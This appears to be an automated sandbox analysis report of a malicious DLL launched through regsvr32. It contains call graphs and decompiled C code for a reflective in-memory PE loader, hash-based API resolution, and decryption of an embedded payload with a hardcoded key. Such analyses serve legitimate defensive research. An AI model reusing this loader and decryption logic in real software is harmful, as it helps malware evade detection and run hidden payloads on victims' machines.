21617->21648 21618 10002955 21619 10001fe0 ___DllMainCRTStartup SetLastError 21618->21619 21620 1000296e 21619->21620 21621 10002990 SetLastError 21620->21621 21622 100029a2 21620->21622 21620->21648 21621->21648 21623 100029b1 SetLastError 21622->21623 21624 100029c3 21622->21624 21623->21648 21625 100029ce SetLastError 21624->21625 21627 100029e0 GetNativeSystemInfo 21624->21627 21625->21648 21628 10002a94 SetLastError 21627->21628 21629 10002aa6 VirtualAlloc 21627->21629 21628->21648 21630 10002af2 GetProcessHeap HeapAlloc 21629->21630 21631 10002ac7 VirtualAlloc 21629->21631 21633 10002b2c 21630->21633 21634 10002b0c VirtualFree SetLastError 21630->21634 21631->21630 21632 10002ae3 SetLastError 21631->21632 21632->21648 21635 10001fe0 ___DllMainCRTStartup SetLastError 21633->21635 21634->21648 21636 10002b8e 21635->21636 21637 10002b92 21636->21637 21638 10002b9c VirtualAlloc 21636->21638 21689 10002ec0 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 21637->21689 21639 10002bcb ___DllMainCRTStartup 21638->21639 21654 10002010 21639->21654 21642 10002bff ___DllMainCRTStartup 21642->21637 21664 10002670 21642->21664 21646 10002c68 ___DllMainCRTStartup 21646->21637 21646->21648 21683 e76395 21646->21683 21648->21390 21649 10002ccf SetLastError 21649->21637 21652 10001ffb 21651->21652 21653 10001fef SetLastError 21651->21653 21652->21617 21652->21618 21652->21648 21653->21652 21655 10002040 21654->21655 21656 100020d3 21655->21656 21657 1000207c VirtualAlloc 21655->21657 21663 100020f0 ___DllMainCRTStartup 21655->21663 21658 10001fe0 ___DllMainCRTStartup SetLastError 21656->21658 21659 100020a0 21657->21659 21660 100020a7 ___DllMainCRTStartup 21657->21660 21661 100020ec 21658->21661 21659->21663 21660->21655 21662 100020f4 VirtualAlloc 21661->21662 21661->21663 21662->21663 21663->21642 21665 100026a9 IsBadReadPtr 21664->21665 21674 1000269f 21664->21674 21667 100026d3 21665->21667 21665->21674 21668 10002705 SetLastError 21667->21668 21669 10002719 21667->21669 21667->21674 21668->21674 21690 10001f00 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 21669->21690 21671 10002733 21672 1000273f SetLastError 21671->21672 21676 10002769 21671->21676 21672->21674 21674->21637 21677 10002300 21674->21677 21675 10002879 SetLastError 21675->21674 21676->21674 21676->21675 21681 10002348 ___DllMainCRTStartup 21677->21681 21678 10002451 21679 100021d0 ___DllMainCRTStartup 2 API calls 21678->21679 21680 1000242d 21679->21680 21680->21646 21681->21678 21681->21680 21691 100021d0 21681->21691 21684 e76453 21683->21684 21685 e7647e 21683->21685 21698 e7efdd 21684->21698 21685->21648 21685->21649 21689->21648 21690->21671 21692 100021e2 21691->21692 21693 100021ec 21691->21693 21692->21681 21694 10002254 VirtualProtect 21693->21694 21695 100021fa 21693->21695 21694->21692 21695->21692 21697 10002232 VirtualFree 21695->21697 21697->21692 21699 e7f548 21698->21699 21703 e7f760 21699->21703 21705 e76466 21699->21705 21707 e7e1f8 GetPEB 21699->21707 21709 e7fecb GetPEB 21699->21709 21714 e8061d 21699->21714 21718 e61a34 21699->21718 21732 e80db1 GetPEB 21699->21732 21733 e82d0a GetPEB 21699->21733 21734 e7fe2a 21699->21734 21738 e6c307 GetPEB 21699->21738 21722 e785ff 21703->21722 21705->21685 21711 e7d11a 21705->21711 21707->21699 21709->21699 21712 e6eb52 GetPEB 21711->21712 21713 e7d1b1 ExitProcess 21712->21713 21713->21685 21715 e80636 21714->21715 21739 e6eb52 21715->21739 21719 e61a59 21718->21719 21720 e6eb52 GetPEB 21719->21720 21721 e61aeb 21720->21721 21721->21699 21723 e78626 21722->21723 21724 e7fe2a GetPEB 21723->21724 21725 e7878e 21724->21725 21747 e82c24 21725->21747 21727 e787c7 21731 e787d2 21727->21731 21751 e81538 GetPEB 21727->21751 21729 e787ec 21752 e81538 GetPEB 21729->21752 21731->21705 21732->21699 21733->21699 21735 e7fe3d 21734->21735 21753 e6c28c 21735->21753 21738->21699 21740 e6ebf7 21739->21740 21741 e6ec1b lstrcmpiW 21739->21741 21745 e7567b GetPEB 21740->21745 21741->21699 21743 e6ec06 21746 e6ec31 GetPEB 21743->21746 21745->21743 21746->21741 21748 e82c57 21747->21748 21749 e6eb52 GetPEB 21748->21749 21750 e82ced CreateProcessW 21749->21750 21750->21727 21751->21729 21752->21731 21754 e6c2a9 21753->21754 21757 e676e0 21754->21757 21758 e676f8 21757->21758 21759 e6eb52 GetPEB 21758->21759 21760 e67793 21759->21760 21760->21699 21761 10013d98 21770 10013da4 __EH_prolog3 21761->21770 21763 10013df2 21788 1001398e EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 21763->21788 21767 10013dff 21768 10013e05 21767->21768 21769 10013e18 ~_Task_impl 21767->21769 21789 10013c4d 88 API calls 4 library calls 21768->21789 21770->21763 21772 10013a9b EnterCriticalSection 21770->21772 21786 1000a0db 2 API calls 4 library calls 21770->21786 21787 10013bab TlsAlloc InitializeCriticalSection 21770->21787 21776 10013aba 21772->21776 21773 10013b8a LeaveCriticalSection 21773->21770 21774 10013af3 21790 100134f9 21774->21790 21775 10013b08 GlobalHandle GlobalUnlock 21778 100134f9 ctype 81 API calls 21775->21778 21776->21774 21776->21775 21785 10013b76 _memset 21776->21785 21780 10013b25 GlobalReAlloc 21778->21780 21781 10013b2f 21780->21781 21782 10013b57 GlobalLock 21781->21782 21783 10013b48 LeaveCriticalSection 21781->21783 21784 10013b3a GlobalHandle GlobalLock 21781->21784 21782->21785 21783->21782 21784->21783 21785->21773 21786->21770 21787->21770 21788->21767 21789->21769 21791 1001350c ctype 21790->21791 21792 10013519 GlobalAlloc 21791->21792 21794 10001040 81 API calls 2 library calls 21791->21794 21792->21781 21794->21792

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 10002900-10002927 call 10001fe0 3 10002930-10002941 0->3 4 10002929-1000292b 0->4 6 10002943-10002950 SetLastError 3->6 7 10002955-10002970 call 10001fe0 3->7 5 10002d1a-10002d1d 4->5 6->5 10 10002972-10002974 7->10 11 10002979-1000298e 7->11 10->5 12 10002990-1000299d SetLastError 11->12 13 100029a2-100029af 11->13 12->5 14 100029b1-100029be SetLastError 13->14 15 100029c3-100029cc 13->15 14->5 16 100029e0-10002a01 15->16 17 100029ce-100029db SetLastError 15->17 18 10002a15-10002a1f 16->18 17->5 19 10002a21-10002a28 18->19 20 10002a57-10002a92 GetNativeSystemInfo 18->20 21 10002a38-10002a44 19->21 22 10002a2a-10002a36 19->22 23 10002a94-10002aa1 SetLastError 20->23 24 10002aa6-10002ac5 VirtualAlloc 20->24 25 10002a47-10002a4d 21->25 22->25 23->5 26 10002af2-10002b0a GetProcessHeap HeapAlloc 24->26 27 10002ac7-10002ae1 VirtualAlloc 24->27 28 10002a55 25->28 29 10002a4f-10002a52 25->29 31 10002b2c-10002b90 call 10001fe0 26->31 32 10002b0c-10002b27 VirtualFree SetLastError 26->32 27->26 30 10002ae3-10002aed SetLastError 27->30 28->18 29->28 30->5 36 10002b92 31->36 37 10002b9c-10002c01 VirtualAlloc call 10001e60 call 10002010 31->37 32->5 38 10002d0c-10002d18 call 10002ec0 36->38 45 10002c03 37->45 46 10002c0d-10002c1e 37->46 38->5 45->38 47 10002c20-10002c36 call 10002500 46->47 48 10002c38-10002c3b 46->48 50 10002c42-10002c50 call 10002670 47->50 48->50 54 10002c52 50->54 55 10002c5c-10002c6a call 10002300 50->55 54->38 58 10002c76-10002c84 call 10002480 55->58 59 10002c6c 55->59 62 10002c86 58->62 63 10002c8d-10002c96 58->63 59->38 62->38 64 10002c98-10002c9f 63->64 65 10002cfd-10002d00 63->65 67 10002ca1-10002cc3 call e76395 64->67 68 10002cea-10002cf8 64->68 66 10002d07-10002d0a 65->66 66->5 70 10002cc6-10002ccd 67->70 69 10002cfb 68->69 69->66 71 10002cde-10002ce8 70->71 72 10002ccf-10002cda SetLastError 70->72 71->69 72->38
                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				signed short* _v16;
                                                                                                                                                                            				void* _v20;
                                                                                                                                                                            				void* _v24;
                                                                                                                                                                            				long _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				char _v68;
                                                                                                                                                                            				void* _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				intOrPtr* _v80;
                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                            				void* _v88;
                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                            				void* _t180;
                                                                                                                                                                            				void* _t191;
                                                                                                                                                                            				void* _t198;
                                                                                                                                                                            				void* _t202;
                                                                                                                                                                            				intOrPtr _t209;
                                                                                                                                                                            				void* _t220;
                                                                                                                                                                            				intOrPtr _t269;
                                                                                                                                                                            				intOrPtr _t278;
                                                                                                                                                                            				intOrPtr _t326;
                                                                                                                                                                            
                                                                                                                                                                            				_v100 = __ecx;
                                                                                                                                                                            				_v72 = 0;
                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                            				if(E10001FE0(_v100, _a8, 0x40) != 0) {
                                                                                                                                                                            					_v16 = _a4;
                                                                                                                                                                            					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                                            						_t10 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                                                                                            						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                                                                            							_t15 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                                                                                            							_v80 = _a4 +  *_t15;
                                                                                                                                                                            							if( *_v80 == 0x4550) {
                                                                                                                                                                            								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                                            									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                                            										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                            										_v32 =  *(_v80 + 0x38);
                                                                                                                                                                            										_v12 = 0;
                                                                                                                                                                            										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                                                                            											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                                                                            												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                                                                            											}
                                                                                                                                                                            											if(_v88 > _v20) {
                                                                                                                                                                            												_v20 = _v88;
                                                                                                                                                                            											}
                                                                                                                                                                            											_v12 = _v12 + 1;
                                                                                                                                                                            											_v84 = _v84 + 0x28;
                                                                                                                                                                            										}
                                                                                                                                                                            										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
                                                                                                                                                                            										_t65 = _v64 - 1; // -1
                                                                                                                                                                            										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                                                                            											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                                                                            											_v24 = _t180;
                                                                                                                                                                            											if(_v24 != 0) {
                                                                                                                                                                            												L26:
                                                                                                                                                                            												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                                                            												if(_v72 != 0) {
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                                                                            													asm("sbb edx, edx");
                                                                                                                                                                            													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                                                                            													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                                                                            													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                                                                            														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                                                                            														_v8 = _t191;
                                                                                                                                                                            														E10001E60(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                                                                            														_t115 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                                                                                            														 *_v72 = _v8 +  *_t115;
                                                                                                                                                                            														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                                                                            														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                                                                            														if(_t198 != 0) {
                                                                                                                                                                            															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                                                                            															_v76 = _t269;
                                                                                                                                                                            															if(_t269 == 0) {
                                                                                                                                                                            																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                                                                            															} else {
                                                                                                                                                                            																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
                                                                                                                                                                            															}
                                                                                                                                                                            															if(E10002670(_v100, _v72) != 0) {
                                                                                                                                                                            																_t202 = E10002300(_v100, _v72); // executed
                                                                                                                                                                            																if(_t202 != 0) {
                                                                                                                                                                            																	if(E10002480(_v100, _v72) != 0) {
                                                                                                                                                                            																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                                                                            																			 *(_v72 + 0x2c) = 0;
                                                                                                                                                                            																			L49:
                                                                                                                                                                            																			return _v72;
                                                                                                                                                                            																		}
                                                                                                                                                                            																		if( *(_v72 + 0x14) == 0) {
                                                                                                                                                                            																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                                                            																			L47:
                                                                                                                                                                            																			goto L49;
                                                                                                                                                                            																		}
                                                                                                                                                                            																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                                                                            																		_t209 =  *0x10058ed8; // 0x0
                                                                                                                                                                            																		_t278 =  *0x10058ed4; // 0x1
                                                                                                                                                                            																		_t326 =  *0x10058ed0; // 0x10000000
                                                                                                                                                                            																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                                                                            																		if(_v92 != 0) {
                                                                                                                                                                            																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                                                                            																			goto L47;
                                                                                                                                                                            																		}
                                                                                                                                                                            																		SetLastError(0x45a);
                                                                                                                                                                            																		L50:
                                                                                                                                                                            																		E10002EC0(_v100, _v72);
                                                                                                                                                                            																		return 0;
                                                                                                                                                                            																	}
                                                                                                                                                                            																	goto L50;
                                                                                                                                                                            																}
                                                                                                                                                                            																goto L50;
                                                                                                                                                                            															}
                                                                                                                                                                            															goto L50;
                                                                                                                                                                            														}
                                                                                                                                                                            														goto L50;
                                                                                                                                                                            													}
                                                                                                                                                                            													goto L50;
                                                                                                                                                                            												}
                                                                                                                                                                            												VirtualFree(_v24, 0, 0x8000);
                                                                                                                                                                            												SetLastError(0xe);
                                                                                                                                                                            												return 0;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                                                                            											_v24 = _t220;
                                                                                                                                                                            											if(_v24 != 0) {
                                                                                                                                                                            												goto L26;
                                                                                                                                                                            											}
                                                                                                                                                                            											SetLastError(0xe);
                                                                                                                                                                            											return 0;
                                                                                                                                                                            										}
                                                                                                                                                                            										SetLastError(0xc1);
                                                                                                                                                                            										return 0;
                                                                                                                                                                            									}
                                                                                                                                                                            									SetLastError(0xc1);
                                                                                                                                                                            									return 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								SetLastError(0xc1);
                                                                                                                                                                            								return 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							SetLastError(0xc1);
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					SetLastError(0xc1);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}





























                                                                                                                                                                            0x10002906
                                                                                                                                                                            0x10002909
                                                                                                                                                                            0x10002910
                                                                                                                                                                            0x10002927
                                                                                                                                                                            0x10002933
                                                                                                                                                                            0x10002941
                                                                                                                                                                            0x10002958
                                                                                                                                                                            0x10002970
                                                                                                                                                                            0x1000297f
                                                                                                                                                                            0x10002982
                                                                                                                                                                            0x1000298e
                                                                                                                                                                            0x100029af
                                                                                                                                                                            0x100029cc
                                                                                                                                                                            0x100029ee
                                                                                                                                                                            0x100029f7
                                                                                                                                                                            0x100029fa
                                                                                                                                                                            0x10002a15
                                                                                                                                                                            0x10002a28
                                                                                                                                                                            0x10002a44
                                                                                                                                                                            0x10002a2a
                                                                                                                                                                            0x10002a33
                                                                                                                                                                            0x10002a33
                                                                                                                                                                            0x10002a4d
                                                                                                                                                                            0x10002a52
                                                                                                                                                                            0x10002a52
                                                                                                                                                                            0x10002a09
                                                                                                                                                                            0x10002a12
                                                                                                                                                                            0x10002a12
                                                                                                                                                                            0x10002a5b
                                                                                                                                                                            0x10002a78
                                                                                                                                                                            0x10002a81
                                                                                                                                                                            0x10002a92
                                                                                                                                                                            0x10002ab8
                                                                                                                                                                            0x10002abe
                                                                                                                                                                            0x10002ac5
                                                                                                                                                                            0x10002af2
                                                                                                                                                                            0x10002b03
                                                                                                                                                                            0x10002b0a
                                                                                                                                                                            0x10002b32
                                                                                                                                                                            0x10002b44
                                                                                                                                                                            0x10002b4b
                                                                                                                                                                            0x10002b54
                                                                                                                                                                            0x10002b5d
                                                                                                                                                                            0x10002b66
                                                                                                                                                                            0x10002b6f
                                                                                                                                                                            0x10002b78
                                                                                                                                                                            0x10002b90
                                                                                                                                                                            0x10002bae
                                                                                                                                                                            0x10002bb4
                                                                                                                                                                            0x10002bc6
                                                                                                                                                                            0x10002bd4
                                                                                                                                                                            0x10002bda
                                                                                                                                                                            0x10002be4
                                                                                                                                                                            0x10002bfa
                                                                                                                                                                            0x10002c01
                                                                                                                                                                            0x10002c18
                                                                                                                                                                            0x10002c1b
                                                                                                                                                                            0x10002c1e
                                                                                                                                                                            0x10002c3b
                                                                                                                                                                            0x10002c20
                                                                                                                                                                            0x10002c33
                                                                                                                                                                            0x10002c33
                                                                                                                                                                            0x10002c50
                                                                                                                                                                            0x10002c63
                                                                                                                                                                            0x10002c6a
                                                                                                                                                                            0x10002c84
                                                                                                                                                                            0x10002c96
                                                                                                                                                                            0x10002d00
                                                                                                                                                                            0x10002d07
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002d07
                                                                                                                                                                            0x10002c9f
                                                                                                                                                                            0x10002cf8
                                                                                                                                                                            0x10002cfb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002cfb
                                                                                                                                                                            0x10002cac
                                                                                                                                                                            0x10002caf
                                                                                                                                                                            0x10002cb5
                                                                                                                                                                            0x10002cbc
                                                                                                                                                                            0x10002cc6
                                                                                                                                                                            0x10002ccd
                                                                                                                                                                            0x10002ce1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002ce1
                                                                                                                                                                            0x10002cd4
                                                                                                                                                                            0x10002d0c
                                                                                                                                                                            0x10002d13
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002d18
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c86
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c6c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c52
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002c03
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002b92
                                                                                                                                                                            0x10002b17
                                                                                                                                                                            0x10002b1f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002b25
                                                                                                                                                                            0x10002ad4
                                                                                                                                                                            0x10002ada
                                                                                                                                                                            0x10002ae1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002ae5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002aeb
                                                                                                                                                                            0x10002a99
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002a9f
                                                                                                                                                                            0x100029d3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100029d9
                                                                                                                                                                            0x100029b6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100029bc
                                                                                                                                                                            0x10002995
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000299b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002972
                                                                                                                                                                            0x10002948
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000294e
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1
                                                                                                                                                                            • SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                                                                                            • Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
                                                                                                                                                                            • Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                                                                                            • Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				struct HWND__* _v28;
                                                                                                                                                                            				struct HWND__* _v32;
                                                                                                                                                                            				long _v36;
                                                                                                                                                                            				int _v40;
                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				void* _t38;
                                                                                                                                                                            				long _t45;
                                                                                                                                                                            				long _t47;
                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                            				void* _t63;
                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                            
                                                                                                                                                                            				_t79 = __esi;
                                                                                                                                                                            				_t78 = __edi;
                                                                                                                                                                            				_t64 = __ebx;
                                                                                                                                                                            				_v56 = _a8;
                                                                                                                                                                            				 *0x10058ed0 = _a4;
                                                                                                                                                                            				_t72 = _a8;
                                                                                                                                                                            				 *0x10058ed4 = _a8;
                                                                                                                                                                            				 *0x10058ed8 = _a12;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_t38 = E10008860(__eflags); // executed
                                                                                                                                                                            				if(_t38 != 0) {
                                                                                                                                                                            					_push(0x10029b4c);
                                                                                                                                                                            					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x10056f08 = 0;
                                                                                                                                                                            				 *0x10056f0c = 0;
                                                                                                                                                                            				 *0x10056f10 = 0;
                                                                                                                                                                            				 *0x10056f18 = 0;
                                                                                                                                                                            				 *0x10056f14 = 0;
                                                                                                                                                                            				_v40 = 0x44368d;
                                                                                                                                                                            				_v52 = 0x3f8fc5;
                                                                                                                                                                            				_v20 = 0x3b272b;
                                                                                                                                                                            				_v24 = 0x2feb60;
                                                                                                                                                                            				_v44 = 0xdd3c;
                                                                                                                                                                            				_v48 = 0x47c;
                                                                                                                                                                            				_v36 = 0x24e00;
                                                                                                                                                                            				_v28 = E10006170(L"kernel32.dll");
                                                                                                                                                                            				_v32 = E10006170(L"ntdll.dll");
                                                                                                                                                                            				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
                                                                                                                                                                            				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
                                                                                                                                                                            				_t95 =  *0x10058eb8;
                                                                                                                                                                            				if( *0x10058eb8 == 0) {
                                                                                                                                                                            					_t45 = E10017716(0x10029b18);
                                                                                                                                                                            					_t47 = E10017716("8192") | 0x00001000;
                                                                                                                                                                            					__eflags = _t47;
                                                                                                                                                                            					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
                                                                                                                                                                            					_v12 = _t63;
                                                                                                                                                                            				}
                                                                                                                                                                            				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
                                                                                                                                                                            				_t68 =  *0x10056f04; // 0x730f
                                                                                                                                                                            				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
                                                                                                                                                                            				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
                                                                                                                                                                            				E10004F00(_v16, _v12, _v36);
                                                                                                                                                                            				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
                                                                                                                                                                            				 *0x10058edc = _t56;
                                                                                                                                                                            				ShowWindow(0, _v40);
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}























                                                                                                                                                                            0x100088e0
                                                                                                                                                                            0x100088e0
                                                                                                                                                                            0x100088e0
                                                                                                                                                                            0x100088e9
                                                                                                                                                                            0x100088ef
                                                                                                                                                                            0x100088f5
                                                                                                                                                                            0x100088f8
                                                                                                                                                                            0x10008901
                                                                                                                                                                            0x10008906
                                                                                                                                                                            0x1000890d
                                                                                                                                                                            0x10008914
                                                                                                                                                                            0x1000891b
                                                                                                                                                                            0x10008922
                                                                                                                                                                            0x10008929
                                                                                                                                                                            0x10008930
                                                                                                                                                                            0x10008966
                                                                                                                                                                            0x1000896b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10008973
                                                                                                                                                                            0x10008932
                                                                                                                                                                            0x1000893c
                                                                                                                                                                            0x10008946
                                                                                                                                                                            0x10008950
                                                                                                                                                                            0x1000895a
                                                                                                                                                                            0x1000897a
                                                                                                                                                                            0x10008981
                                                                                                                                                                            0x10008988
                                                                                                                                                                            0x1000898f
                                                                                                                                                                            0x10008996
                                                                                                                                                                            0x1000899d
                                                                                                                                                                            0x100089a4
                                                                                                                                                                            0x100089b8
                                                                                                                                                                            0x100089c8
                                                                                                                                                                            0x100089dc
                                                                                                                                                                            0x100089f2
                                                                                                                                                                            0x100089f7
                                                                                                                                                                            0x100089fe
                                                                                                                                                                            0x10008a3b
                                                                                                                                                                            0x10008a51
                                                                                                                                                                            0x10008a51
                                                                                                                                                                            0x10008a63
                                                                                                                                                                            0x10008a00
                                                                                                                                                                            0x10008a2b
                                                                                                                                                                            0x10008a31
                                                                                                                                                                            0x10008a31
                                                                                                                                                                            0x10008a73
                                                                                                                                                                            0x10008a7b
                                                                                                                                                                            0x10008a8a
                                                                                                                                                                            0x10008a98
                                                                                                                                                                            0x10008aac
                                                                                                                                                                            0x10008ac1
                                                                                                                                                                            0x10008ac6
                                                                                                                                                                            0x10008ad1
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
